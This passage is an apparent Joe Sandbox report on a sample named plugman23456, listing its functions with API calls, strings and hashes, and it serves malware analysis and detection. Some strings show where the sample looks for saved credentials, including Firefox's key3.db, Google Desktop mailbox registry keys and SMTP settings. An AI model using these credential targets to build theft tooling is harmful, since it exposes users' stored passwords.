                          • Instruction ID: bdfce0b549e0f997c013470e25be1f804495b962c90005f3873202e4793523b9
                          • Opcode Fuzzy Hash: 0881872b442e91a884b62adcb4090c2e31bdfe9a46a4641592ad1aca8c145518
                          • Instruction Fuzzy Hash: 6A012D36801129BBDB119FA59C89EFFBFBCFF46750F044125FD05A2141D77455018BA5
                          Function 0040B994 Relevance: 7.5, APIs: 5, Instructions: 44windowCOMMON
                          Download Yara Rule
                          APIs
                          • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B9B1
                            • Part of subcall function 00406C62: LoadCursorA.USER32(00000000,00007F02), ref: 00406C69
                            • Part of subcall function 00406C62: SetCursor.USER32(00000000), ref: 00406C70
                          • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B9D4
                            • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B929
                            • Part of subcall function 0040B903: sprintf.MSVCRT ref: 0040B953
                            • Part of subcall function 0040B903: _mbscat.MSVCRT ref: 0040B966
                            • Part of subcall function 0040B903: SendMessageA.USER32(?,00000401,00000000,?), ref: 0040B98C
                          • SetCursor.USER32 ref: 0040B9F9
                          • SetFocus.USER32(?), ref: 0040BA0B
                          • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040BA22
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: MessageSend$Cursor$sprintf$FocusLoad_mbscat
                          • String ID:
                          • API String ID: 2374668499-0
                          • Opcode ID: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                          • Instruction ID: f32a2dbc35f7bf6d698eec3472f2a5e56a7287d41e7566127b95ec9cf4f32314
                          • Opcode Fuzzy Hash: fb4c2d2117a6e63931818c59792b7e5b7d388045a30bfc7bbc7a4f43378f101d
                          • Instruction Fuzzy Hash: 450129B5204604EFD326AB75DC85FA6B7E8FF48305F0504B9F2499B271CA716D018B14
                          Function 00409A32 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: b4bc8ea3596b91dfe4b466af9048751b201f61ada43734c3eff6748fa3cff06f
                          • Instruction ID: b8efe39ffa321d4f2ce8ce974eba3160cbf96dc633dc1e2aadb4e529a4dc2577
                          • Opcode Fuzzy Hash: b4bc8ea3596b91dfe4b466af9048751b201f61ada43734c3eff6748fa3cff06f
                          • Instruction Fuzzy Hash: A9F0F4726057855BD7209F6999C1A57F7D9BB98714791083FF189F3A81CB38FC404A18
                          Function 00409A98 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A3E
                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A4C
                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A5D
                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A74
                            • Part of subcall function 00409A32: ??3@YAXPAX@Z.MSVCRT ref: 00409A7D
                          • ??3@YAXPAX@Z.MSVCRT ref: 00409AB3
                          • ??3@YAXPAX@Z.MSVCRT ref: 00409AC6
                          • ??3@YAXPAX@Z.MSVCRT ref: 00409AD9
                          • ??3@YAXPAX@Z.MSVCRT ref: 00409AEC
                          • ??3@YAXPAX@Z.MSVCRT ref: 00409B00
                            • Part of subcall function 00407A55: ??3@YAXPAX@Z.MSVCRT ref: 00407A5C
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??3@
                          • String ID:
                          • API String ID: 613200358-0
                          • Opcode ID: 71fd03afa15095c2d0ce6bd683e65a22e38aca543c51e447af1f15dc64016add
                          • Instruction ID: 0e1833da384361268bbd99a4020487bffb4c29eeff2b5ca4c2d3cb4a232d8152
                          • Opcode Fuzzy Hash: 71fd03afa15095c2d0ce6bd683e65a22e38aca543c51e447af1f15dc64016add
                          • Instruction Fuzzy Hash: 3FF0A932F068B05BC2117B669002B0EB398AD81B2831A016FF8147B6D2CB3CBC504ADE
                          Function 00410777 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00407107: memset.MSVCRT ref: 00407127
                            • Part of subcall function 00407107: GetClassNameA.USER32(?,00000000,000000FF), ref: 0040713A
                            • Part of subcall function 00407107: _strcmpi.MSVCRT ref: 0040714C
                          • SetBkMode.GDI32(?,00000001), ref: 0041079E
                          • GetSysColor.USER32(00000005), ref: 004107A6
                          • SetBkColor.GDI32(?,00000000), ref: 004107B0
                          • SetTextColor.GDI32(?,00C00000), ref: 004107BE
                          • GetSysColorBrush.USER32(00000005), ref: 004107C6
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Color$BrushClassModeNameText_strcmpimemset
                          • String ID:
                          • API String ID: 2775283111-0
                          • Opcode ID: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                          • Instruction ID: 687cb18978465a3feaaa07aa3b8de37e8775815fe2b8de28c5581ef0bdca0d30
                          • Opcode Fuzzy Hash: 30732ddb99e3546892e286b48803550164489c166bef4c71f88bf4e2e56830df
                          • Instruction Fuzzy Hash: AAF03135101109BBCF112FA5DC49ADE3F25EF05711F14812AFA25A85F1CBB5A990DF58
                          Function 0041479C Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 96COMMON
                          Download Yara Rule
                          APIs
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 004147CE
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
                          • String ID: winSeekFile$winTruncate1$winTruncate2
                          • API String ID: 885266447-2471937615
                          • Opcode ID: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                          • Instruction ID: 76c2d8f9c45a6ab14154b13c081d04d7f34c1e3f6c53ca943db3ce1179081271
                          • Opcode Fuzzy Hash: 3989f365befeb7fb84bae78e7a4911c3188eb7aafc144da4ed62710c54f6e9f9
                          • Instruction Fuzzy Hash: 5C313175600700AFE720AF65CC41EABB7E8FB88715F104A2EF965932D1D734E8808B29
                          Function 00406AC7 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 63COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406D01: CreateFileA.KERNELBASE(eBD,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406D13
                          • GetFileSize.KERNEL32(00000000,00000000,key3.db,00000143,00000000,?,00406C55,00000000,?,00000000,?), ref: 00406AEB
                          • CloseHandle.KERNEL32(?), ref: 00406B11
                            • Part of subcall function 00407902: ??3@YAXPAX@Z.MSVCRT ref: 00407909
                            • Part of subcall function 00407902: ??2@YAPAXI@Z.MSVCRT ref: 00407917
                            • Part of subcall function 00407560: ReadFile.KERNELBASE(00000000,?,004441E4,00000000,00000000), ref: 00407577
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: File$??2@??3@CloseCreateHandleReadSize
                          • String ID: Ul@$key3.db
                          • API String ID: 1968906679-1563549157
                          • Opcode ID: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                          • Instruction ID: 1a03c8060d8a16f0d136589656c0636480a797a3ae37aee6ed6b4138e5904ac9
                          • Opcode Fuzzy Hash: 017d44aeec099e6ad840d6e86d2f8ec0eb2b3f662b3005ae3e25e14883e9f582
                          • Instruction Fuzzy Hash: EA1181B1D00624ABCB10AF25DC8588E7FB5EF45364B15C177F80AEB291D638ED61CB98
                          Function 0040E103 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _strcmpi$_mbscpy
                          • String ID: smtp
                          • API String ID: 2625860049-60245459
                          • Opcode ID: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                          • Instruction ID: 1dd5f7db1b4edf1a80ad81ce147274c535078e8a2a303909ef95c05f23963bac
                          • Opcode Fuzzy Hash: c45caa4284447f7f2e2e6364178d5851a287a2bec06db597c6e622e98960e237
                          • Instruction Fuzzy Hash: DB11C872500219ABEB10AB66CC41A8A7399EF40358F10453BE945F71C2EF39E9698B98
                          Function 0040821D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61registryCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00410A9C: RegOpenKeyExA.KERNEL32(00401C4C,00401C4C,00000000,00020019,?,00401C4C,?,?,?), ref: 00410AAF
                          • memset.MSVCRT ref: 00408258
                            • Part of subcall function 00410B62: RegEnumKeyExA.KERNEL32(00000000,?,?,000000FF,00000000,00000000,00000000,?,?,00000000), ref: 00410B85
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082A6
                          • RegCloseKey.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,00000000,000000FF,?,?,?), ref: 004082C3
                          Strings
                          • Software\Google\Google Desktop\Mailboxes, xrefs: 00408230
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Close$EnumOpenmemset
                          • String ID: Software\Google\Google Desktop\Mailboxes
                          • API String ID: 2255314230-2212045309
                          • Opcode ID: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                          • Instruction ID: e7ff4aa50d33639bacb2d5000aefce928628a80d8311d3545e17288fa3d3d8ee
                          • Opcode Fuzzy Hash: bd388eefff722b401c994613a19154ddee7b9885900c8831656236c5d79d68fa
                          • Instruction Fuzzy Hash: 9D118F72408345ABD710EE51DC01EABBBACEFD0344F04093EBD9491091EB75D958C6AA
                          Function 0040C26C Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 43windowCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040C28C
                          • SetFocus.USER32(?), ref: 0040C314
                            • Part of subcall function 0040C256: PostMessageA.USER32(?,00000415,00000000,00000000), ref: 0040C265
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: FocusMessagePostmemset
                          • String ID: S_@$l
                          • API String ID: 3436799508-4018740455
                          • Opcode ID: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                          • Instruction ID: f4172cee4733ded4edf5c13384372fb960b3a31eee454cf66b40e3553cb76095
                          • Opcode Fuzzy Hash: f9fe39f7a068bdda1ebd36b4f409f4e20a0398a8366c16793ed62aa8fa7a4232
                          • Instruction Fuzzy Hash: 1411A172900158CBDF219B14CD457DE7BB9AF81308F0800F5E94C7B296C7B45A89CFA9
                          Function 0040929C Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 37COMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 004092C0
                          • GetPrivateProfileStringA.KERNEL32(0045A550,0000000A,0044C52F,?,00001000,0045A448), ref: 004092E2
                          • _mbscpy.MSVCRT ref: 004092FC
                          Strings
                          • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 004092A9
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: PrivateProfileString_mbscpymemset
                          • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>
                          • API String ID: 408644273-3424043681
                          • Opcode ID: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                          • Instruction ID: a8dcbc571cfa5336c44be942190f1d9429afcf202dd246abef1f156f809eb6de
                          • Opcode Fuzzy Hash: dda02bb9c94d4f17af39156b30a74aa4a90c932e0b7e9f3942217324440be20b
                          • Instruction Fuzzy Hash: 02F0E0725011A83AEB1297549C02FCA779CCB0D307F1440A2B749E20C1D5F8DEC44A9D
                          Function 00407482 Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 35COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbscpy
                          • String ID: C^@$X$ini
                          • API String ID: 714388716-917056472
                          • Opcode ID: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                          • Instruction ID: 848b4a5d233ab05c703a0d630411b91f0640a461eb42b4d170138ac17b774cf5
                          • Opcode Fuzzy Hash: d9dcd15f5501d6044b59d83579e7760d9dc142544ad26eb0a5a2565b401737d3
                          • Instruction Fuzzy Hash: F601B2B1D002489FDB50DFE9D9856CEBFF4AB08318F10802AE415F6240EB7895458F59
                          Function 00401000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 32windowCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00406FC7: memset.MSVCRT ref: 00406FD1
                            • Part of subcall function 00406FC7: _mbscpy.MSVCRT ref: 00407011
                          • CreateFontIndirectA.GDI32(?), ref: 0040101F
                          • SendDlgItemMessageA.USER32(?,000003EC,00000030,00000000,00000000), ref: 0040103E
                          • SendDlgItemMessageA.USER32(?,000003EE,00000030,?,00000000), ref: 0040105B
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ItemMessageSend$CreateFontIndirect_mbscpymemset
                          • String ID: MS Sans Serif
                          • API String ID: 3492281209-168460110
                          • Opcode ID: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                          • Instruction ID: 97d77737ff66efe52178e6fda6de2dc92fca71035f8b3f8e7b76904d62d162b3
                          • Opcode Fuzzy Hash: d4e5890e55cd272a0cdfb621d5336f544a59e77ca07302a9ad9f735f222c5d17
                          • Instruction Fuzzy Hash: F5F02775A4130477E7317BA0EC47F4A3BACAB41B00F044535F652B50E1D2F4A404CB48
                          Function 00407107 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ClassName_strcmpimemset
                          • String ID: edit
                          • API String ID: 275601554-2167791130
                          • Opcode ID: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                          • Instruction ID: 4378e7120b76b93f9ba7f3ad81c4d59275eb15acd3879ac3f183c71196eabbb1
                          • Opcode Fuzzy Hash: bf6c2209122d7ccd6bf6d4d5b504d0ca7740a040d867409a121181f8c875a0cc
                          • Instruction Fuzzy Hash: ADE09BB2C4016A6AEB21A664DC01FE5776CDF59704F0400B6B945E2081E6A4A6884A95
                          Function 0040759E Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20stringCOMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: strlen$_mbscat
                          • String ID: 3CD
                          • API String ID: 3951308622-1938365332
                          • Opcode ID: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                          • Instruction ID: 1107c6f19d6a4433d5fdc1d3c5cfb72f3531f1d81a70b052f8a244d3c085287a
                          • Opcode Fuzzy Hash: d1143cf22a6afbd37b374b0806e036797619bbf072935b8337c8bafa4bdf7e65
                          • Instruction Fuzzy Hash: 1BD0A77390C2603AE61566167C42F8E5BC1CFD433AB15081FF408D1281DA3DE881809D
                          Function 004326AD Relevance: 6.5, APIs: 3, Strings: 1, Instructions: 475COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: rows deleted
                          • API String ID: 2221118986-571615504
                          • Opcode ID: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                          • Instruction ID: 17dfb349c3cd8fc2c2490db290532cf881f14abfa8d6012d9aa572d9710d7201
                          • Opcode Fuzzy Hash: b98c805d9f7a15f03bb69ae15e6c6b0a921ed9a197951f9464e59faa98c73a57
                          • Instruction Fuzzy Hash: D5028171E00218AFDF14DFA5D981AEEBBB5FF08314F14005AF914B7291D7B9AA41CBA4
                          Function 0044338B Relevance: 6.3, APIs: 5, Instructions: 81COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ??2@$memset
                          • String ID:
                          • API String ID: 1860491036-0
                          • Opcode ID: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                          • Instruction ID: bd2fcbe50e3d5b8ec1466eca70e60fda3411ba7e10a355e4f398212a99dd52d4
                          • Opcode Fuzzy Hash: ebb40f1ae782bd27a9c9ebb170ff663f9279e29e1a89e233aa61efeea33ca50f
                          • Instruction Fuzzy Hash: 973162B09107508FE751DF3A8845A16FBE4FF80B05F25486FD549CB2A2E779E5408B19
                          Function 00404888 Relevance: 6.3, APIs: 5, Instructions: 77COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$memcpy
                          • String ID:
                          • API String ID: 368790112-0
                          • Opcode ID: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                          • Instruction ID: 0e4d5a8aef3e538851842ff93af65fc880b0f2046ec3e537946e92548d274f73
                          • Opcode Fuzzy Hash: e33439cddf26871f1b6b72d3f102fac71f305b2afc07238da9e6d18acb06c1a9
                          • Instruction Fuzzy Hash: BB2162B650115DABDF11EE68CD41EDE77ACDF95304F0040A6B708E3151D2749F448B64
                          Function 0040D2A3 Relevance: 6.3, APIs: 5, Instructions: 50COMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset$memcpy
                          • String ID:
                          • API String ID: 368790112-0
                          • Opcode ID: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                          • Instruction ID: 358c417c53aa398974aae77e4359fd90ac0a4dba5340dfd55ca125e4bb0c9b0b
                          • Opcode Fuzzy Hash: b4e43ced28bb4930618584d198fe59dd62a49c5b1c6a4db04c735ab4a5314c67
                          • Instruction Fuzzy Hash: 8E01D8B5A40B406BE235AE25CC03F2AB3A8DF91714F400A2EF692676C1D7B8F509915D
                          Function 004257AA Relevance: 6.2, APIs: 4, Instructions: 181COMMON
                          Download Yara Rule
                          APIs
                          • __allrem.LIBCMT ref: 00425850
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00425885
                          • __allrem.LIBCMT ref: 00425933
                          • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 0042597B
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@
                          • String ID:
                          • API String ID: 1992179935-0
                          • Opcode ID: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                          • Instruction ID: 2fc5b562d87482ee0bf7138f77baf3e4365ffd42061eb2d4d5abd72185a9e376
                          • Opcode Fuzzy Hash: eeae426aa4a2dd52bce4edc8b714b0ba45551b1196620555c2276823dfb77c6c
                          • Instruction Fuzzy Hash: C96180B1A00A29DFCF149B64D840AAEB7B1FF45320F68815AE548AB391D7389D81CF19
                          Function 0042C52C Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 165COMMON
                          Download Yara Rule
                          APIs
                          Strings
                          • too many SQL variables, xrefs: 0042C6FD
                          • variable number must be between ?1 and ?%d, xrefs: 0042C5C2
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: memset
                          • String ID: too many SQL variables$variable number must be between ?1 and ?%d
                          • API String ID: 2221118986-515162456
                          • Opcode ID: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                          • Instruction ID: 69d39437184f158b69242413db2932325e78deb4f0df02558d14bae7a1bb2b74
                          • Opcode Fuzzy Hash: 60d5f5fef70a29d847aa1be0b0a9f40863d4de5ddd7e716af81dbeaf9fd2ce2b
                          • Instruction Fuzzy Hash: 93518B31B00626EFDB29DF68D481BEEB7A4FF09304F50016BE811A7251D779AD51CB88
                          Function 00402624 Relevance: 6.1, APIs: 4, Instructions: 127COMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00410B00: RegQueryValueExA.ADVAPI32(?,?,00000000,?,?,?,?,?,00402658,?), ref: 00410B16
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,0000007F,00000000,00000000,?,?,00000400,00000001), ref: 004026E4
                          • memset.MSVCRT ref: 004026AD
                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(220D5CD0-853A-11D0-84BC-00C04FD43F8F,00000001), ref: 00410902
                            • Part of subcall function 004108E5: UuidFromStringA.RPCRT4(417E2D75-84BD-11D0-84BB-00C04FD43F8F,?), ref: 00410923
                            • Part of subcall function 004108E5: memcpy.MSVCRT ref: 00410961
                            • Part of subcall function 004108E5: CoTaskMemFree.OLE32(00000000), ref: 00410970
                          • WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000002,?,0000007F,00000000,00000000,00000002,00000000,?), ref: 0040279C
                          • LocalFree.KERNEL32(?), ref: 004027A6
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: ByteCharFreeFromMultiStringUuidWide$LocalQueryTaskValuememcpymemset
                          • String ID:
                          • API String ID: 3503910906-0
                          • Opcode ID: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                          • Instruction ID: aa14e43d8b473801bf9d2631992dc1640396fa6537153de3cc175e43cdbeb3f4
                          • Opcode Fuzzy Hash: f86a270f64af7f2cfe52cb4533637fefaa5bfeff9622a9a4a07cc31b63cb9060
                          • Instruction Fuzzy Hash: 0B4183B1408384BFD711DB60CD85AAB77D8AF89314F044A3FF998A31C1D679DA44CB5A
                          Function 0040C8B8 Relevance: 6.1, APIs: 4, Instructions: 115windowCOMMON
                          Download Yara Rule
                          APIs
                          • memset.MSVCRT ref: 0040C922
                          • SendMessageA.USER32(00000000,00000423,00000000,00000000), ref: 0040C966
                          • GetMenuStringA.USER32(?,00000103,?,0000004F,00000000), ref: 0040C980
                          • PostMessageA.USER32(?,00000402,00000000,00000000), ref: 0040CA23
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Message$MenuPostSendStringmemset
                          • String ID:
                          • API String ID: 3798638045-0
                          • Opcode ID: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                          • Instruction ID: 1bc0f942f430aed347c7303033341c470b8779a554354b53929018aa447f6f2a
                          • Opcode Fuzzy Hash: baefdefab252ba5ebdbc5dbfb72098888a57285fb2abb1b9f47d437d3554fda2
                          • Instruction Fuzzy Hash: A241D071600215EBCB24CF24C8C5B97B7A4BF05325F1483B6E958AB2D2C3789D81CBD8
                          Function 0040B5E5 Relevance: 6.1, APIs: 4, Instructions: 114stringCOMMON
                          Download Yara Rule
                          APIs
                            • Part of subcall function 00409DED: ??2@YAPAXI@Z.MSVCRT ref: 00409E0E
                            • Part of subcall function 00409DED: ??3@YAXPAX@Z.MSVCRT ref: 00409ED5
                          • strlen.MSVCRT ref: 0040B60B
                          • atoi.MSVCRT ref: 0040B619
                          • _mbsicmp.MSVCRT ref: 0040B66C
                          • _mbsicmp.MSVCRT ref: 0040B67F
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: _mbsicmp$??2@??3@atoistrlen
                          • String ID:
                          • API String ID: 4107816708-0
                          • Opcode ID: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                          • Instruction ID: e44d10e2ba05df3f3c4ea20365ac2b40f6a529c5f902ff1350b2aa0f2f7d2ce1
                          • Opcode Fuzzy Hash: 481fecb55ebe7fb47740a6b69fad8160bec1c4c1e9b6d2800cf49c311f8ba602
                          • Instruction Fuzzy Hash: 3A413D35900204EFCF10DFA9C481AA9BBF4FF48348F1144BAE815AB392D739DA41CB99
                          Function 004113B2 Relevance: 6.1, APIs: 4, Instructions: 85stringCOMMON
                          Download Yara Rule
                          APIs
                          Memory Dump Source
                          • Source File: 00000016.00000002.397966899.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                          Joe Sandbox IDA Plugin
                          • Snapshot File: hcaresult_22_2_400000_plugman23456.jbxd
                          Similarity
                          • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_gmtime64memcpystrftime
                          • String ID:
                          • API String ID: 1886415126-0
                          • Opcode ID: 2c8248469399fbf04d0dbf47d68c6bd2d8f4f823657728d056fdecfbecaff4db
                          • Instruction ID: 0fc2308174198aa020173da426f8fce31fb0284c5be342abf897f659f69a0370
